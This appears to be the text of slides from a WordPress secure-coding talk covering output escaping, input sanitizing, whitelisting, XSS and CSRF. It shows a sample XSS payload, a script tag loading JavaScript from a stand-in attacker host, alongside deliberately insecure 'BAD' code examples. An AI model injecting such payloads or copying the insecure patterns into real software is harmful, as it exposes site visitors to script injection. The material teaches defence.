5. tl;dr
• Keep your dev environment clean
• Escape your data output
• Sanitize your data inputs
• Validate referrers
• Core functionality should always trump your super
awesome functionality
6. Keep Your Dev Environment Clean
Don’t think that just because you’re on a mac you’re
safe from viruses.
If you’re on a PC, you should assume you’re already
pwned.
9. XSS: Cross-site Scripting
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access
controls such as the same origin policy. Cross-site scripting carried
out on websites accounted for roughly 84% of all security
vulnerabilities documented by Symantec as of 2007.[1] Their effect may
range from a petty nuisance to a significant security risk, depending on
the sensitivity of the data handled by the vulnerable site and the
nature of any security mitigation implemented by the site's owner.
http://en.wikipedia.org/wiki/Cross-site_scripting
10. Escape All The Things On Output
http://codex.wordpress.org/Data_Validation#Output_Sanitation
• Bad data will be tamed
• esc_{context}
• esc_js - Escape single quotes, htmlspecialchar " < > &, and fix
line endings.
• esc_html - Escaping for HTML blocks.
• esc_attr - Escaping for HTML attributes.
• esc_sql - Escapes data for use in a MySQL query.
• esc_url - Checks and cleans a URL.
• esc_textarea - Escaping for textarea values.
11. Sanitize All The Things On Input
http://codex.wordpress.org/Data_Validation#Input_Validation
• sanitize_* and similar functions help for most things
• $_POST = array(‘e’=>‘<script src=‘http://pwnd.com/u.js’></script>’)
• BAD: update_post_meta($id, ‘e’, $_POST[‘e’])
• GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))
• Note: Might unintentionally change data and give unexpected results
12. Whitelisting Data
http://codex.wordpress.org/Data_Validation#Whitelist
• Whitelisting data - Only accept known data
• $_POST = array(
‘pwn’=>‘<script src=‘http://pwnd.com/u.js’></script>’,
‘e’=‘email@domain.com’
);
• BAD:
• foreach( $_POST as $key => $val ) :
update_post_meta($id, $key, $val);
endforeach;
• GOOD: update_post_meta($id, ‘e’, sanitize_email($_POST[‘e’]))
14. CSRF: Cross-site Request Forgery
Cross-site request forgery, also known as a one-click attack or session
riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF,
is a type of malicious exploit of a website whereby unauthorized commands
are transmitted from a user that the website trusts.[2] Unlike cross-site
scripting (XSS), which exploits the trust a user has for a particular site,
CSRF exploits the trust that a site has in a user's browser.
http://en.wikipedia.org/wiki/Cross-site_request_forgery